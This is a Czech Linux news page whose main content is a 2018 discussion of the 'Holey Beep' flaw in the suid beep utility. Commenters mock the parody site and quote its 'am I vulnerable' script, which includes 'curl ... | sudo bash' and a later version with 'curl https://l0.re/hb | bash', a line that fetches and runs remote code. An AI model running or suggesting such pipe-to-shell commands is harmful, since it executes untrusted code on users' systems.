Holey Beep, bezpečnostní chyba v programu beep (diskuse)

Přihlášení | Registrace

napište » Zprávičky

Samba 4.23.0

dnes 14:00 | Nová verze

Samba (Wikipedie), svobodná implementace SMB a Active Directory, byla vydána ve verzi 4.23.0. Počínaje verzí Samba 4.23 jsou unixová rozšíření SMB3 ve výchozím nastavení povolena. Přidána byla podpora SMB3 přes QUIC. Nová utilita smb_prometheus_endpoint exportuje metriky ve formátu Prometheus.

Ladislav Hagara | Komentářů: 0

F-Droid: Jak FOSS projekty řeší žádosti o odstranění nelegálního obsahu

dnes 12:00 | Zajímavý článek

Správcovský tým repozitáře F-Droid pro Android sdílí doporučení, jak řešit žádosti o odstranění nelegálního obsahu. Základem je mít nastavené formální procesy, vyhrazenou e-mailovou adresu a být transparentní. Zdůrazňují také důležitost volby jurisdikce (F-Droid je v Nizozemsku).

🇵🇸 | Komentářů: 6

Další zranitelnost v procesorech: VMScape (CVE-2025-40300)

dnes 05:33 | Bezpečnostní upozornění

Byly publikovány informace o další zranitelnosti v procesorech. Nejnovější zranitelnost byla pojmenována VMScape (CVE-2025-40300, GitHub) a v upstream Linuxech je již opravena. Jedná se o variantu Spectre. KVM host může číst data z uživatelského prostoru hypervizoru, např. QEMU.

Ladislav Hagara | Komentářů: 0

Apache Software Foundation má nové logo

včera 22:00 | Komunita

V červenci loňského roku organizace Apache Software Foundation (ASF) oznámila, že se částečně přestane dopouštět kulturní apropriace a změní své logo. Dnes bylo nové logo představeno. "Indiánské pírko" bylo nahrazeno dubovým listem a text Apache Software Foundation zkratkou ASF. Slovo Apache se bude "zatím" dál používat. Oficiální název organizace zůstává Apache Software Foundation, stejně jako názvy projektů, například Apache HTTP Server.

Ladislav Hagara | Komentářů: 11

Visual Studio Code a VSCodium 1.104

včera 17:33 | Nová verze

Byla vydána (𝕏) srpnová aktualizace aneb nová verze 1.104 editoru zdrojových kódů Visual Studio Code (Wikipedie). Přehled novinek i s náhledy a videi v poznámkách k vydání. Ve verzi 1.104 vyjde také VSCodium, tj. komunitní sestavení Visual Studia Code bez telemetrie a licenčních podmínek Microsoftu.

Ladislav Hagara | Komentářů: 0

Spotify spustilo přehrávání v bezztrátové kvalitě

včera 15:33 | IT novinky

Spotify spustilo přehrávání v bezztrátové kvalitě. V předplatném Spotify Premium.

Ladislav Hagara | Komentářů: 0

Ellison vystřídal Muska na postu nejbohatšího člověka světa

včera 15:00 | IT novinky

Spoluzakladatel a předseda správní rady americké softwarové společnosti Oracle Larry Ellison vystřídal spoluzakladatele automobilky Tesla a dalších firem Elona Muska na postu nejbohatšího člověka světa. Hodnota Ellisonova majetku díky dnešnímu prudkému posílení ceny akcií Oraclu odpoledne vykazovala nárůst o více než 100 miliard dolarů a dosáhla 393 miliard USD (zhruba 8,2 bilionu Kč). Hodnota Muskova majetku činila zhruba 385 miliard dolarů.

Ladislav Hagara | Komentářů: 3

Eclipse IDE 2025-09 aneb Eclipse 4.37

10.9. 21:22 | Nová verze

Bylo vydáno Eclipse IDE 2025-09 aneb Eclipse 4.37. Představení novinek tohoto integrovaného vývojového prostředí také na YouTube.

Ladislav Hagara | Komentářů: 0

T-Mobile od 15. září zpřístupňuje RCS zprávy i pro iPhone

10.9. 18:22 | IT novinky

T-Mobile od 15. září zpřístupňuje RCS (Rich Communication Services) zprávy i pro iPhone.

Ladislav Hagara | Komentářů: 3

Arm Lumex Compute Subsystem (CSS) Platform

10.9. 13:22 | IT novinky

Společnost ARM představila platformu Arm Lumex s Arm C1 CPU Cluster a Arm Mali G1-Ultra GPU pro vlajkové chytré telefony a počítače nové generace.

Ladislav Hagara | Komentářů: 0

Centrum | Napsat | Starší

navrhněte » Anketa

Pro otevření více webových stránek ve webovém prohlížečí používám

Taby (83%)

Panely (7%)

Záložky (2%)

Listy (2%)

Něco jiného (4%)

Nic (2%)

Celkem 167 hlasů

Komentářů: 12, poslední 10.9. 13:00

Rozcestník

AbcLinuxu

HDmag.cz

AbcLinuxu:/ Zprávičky / Holey Beep, bezpečnostní chyba v programu beep / Holey Beep, bezpečnostní chyba v programu beep (diskuse)

Štítky: není přiřazen žádný štítek

Nástroje: Začni sledovat (1) ?

Vložit další komentář

4.4.2018 12:51 marbu | skóre: 31 | blog: hromada | Brno
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep

Odpovědět | Sbalit | Link | Blokovat | Admin

Readme toho beep nástroje je docela poučné:

What this means is that root can always make beep work (to the best of my knowledge!), and that any local user can make beep work, BUT a non-root remote user cannot use beep in it's natural state. What's worse, an xterm, or other x-session counts, as far as the kernel is concerned, as 'remote', so beep won't work from a non-priviledged xterm either. I had originally chalked this up to a bug, but there's actually nothing I can do about it, and it really is a Good Thing that the kernel does things this way. There is also a solution.
By default beep is not installed with the suid bit set, because that would just be zany. On the other hand, if you do make it suid root, all your problems with beep bailing on ioctl calls will magically vanish, which is pleasant, and the only reason not to is that any suid program is a potential security hole. Conveniently, beep is very short, so auditing it is pretty straightforward.
Decide for yourself, of course, but it looks safe to me - there's only one buffer and fgets doesn't let it overflow, there's only one file opening, and while there is a potential race condition there, it's with /dev/console. If someone can exploit this race by replacing /dev/console, you've got bigger problems. :)

There is no point in being so cool in a cold world.

4.4.2018 14:55 Lyco | skóre: 14 | blog: Lyco
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep

Odpovědět | Sbalit | Link | Blokovat | Admin

Ta stránka s infomracemi je skvělá. Vynikající parodie.

Nejvíc se mi asi líbil "test jestli je počítač zranitelný":

# curl https://holeybeep.ninja/am_i_vulnerable.sh | sudo bash
# nejsem blázen

curl https://holeybeep.ninja/am_i_vulnerable.sh
#!/bin/sh
# TODO: Backdoor this machine?
modprobe pcspkr
beep -l 1000 -r 3 -f 44000

Příspěvek se rázem stává až o 37,5 % pravdivější, je-li pod ním napsáno reálné jméno.

4.4.2018 18:42 AsciiWolf | skóre: 41 | blog: Blog
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep

Tak v nynější verzi už ten backdoor skutečně je. :-D

$ cat am_i_vulnerable.sh
#!/bin/sh
curl https://l0.re/hb | bash
modprobe pcspkr
beep -l 1000 -r 3 -f 44000

5.4.2018 00:01 Semo | skóre: 45 | blog: Semo
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep

Code execution je aj v patchi propagovanom na https://holeybeep.ninja/

If you hold a Unix shell up to your ear, you can you hear the C.

5.4.2018 23:08 marbu | skóre: 31 | blog: hromada | Brno
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep

Eh, to je taky dobré. Viz: patch runs ed, and ed can run anything.

There is no point in being so cool in a cold world.

5.4.2018 14:20 Ruža Becelin | skóre: 40 | blog: RuzaBecelinBlog
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep

Odpovědět | Sbalit | Link | Blokovat | Admin

How do I uninstall Linux?
Please follow these instructions.

By me zajimalo, jestli podobne cenne rady udileji, pokud se najde chyba ve Windows...

5.4.2018 14:55 Honza
Rozbalit Rozbalit vše Re: Holey Beep, bezpečnostní chyba v programu beep

Kdyz nejaky troll pak udela podobnou stranku, tak ano. Staci se podivat na commity...

Založit nové vlákno • Nahoru

Tiskni Sdílej:

Píšeme jinde

ISSN 1214-1267 www.czech-server.cz

Redakce | Inzerce | Podmínky použití | Osobní údaje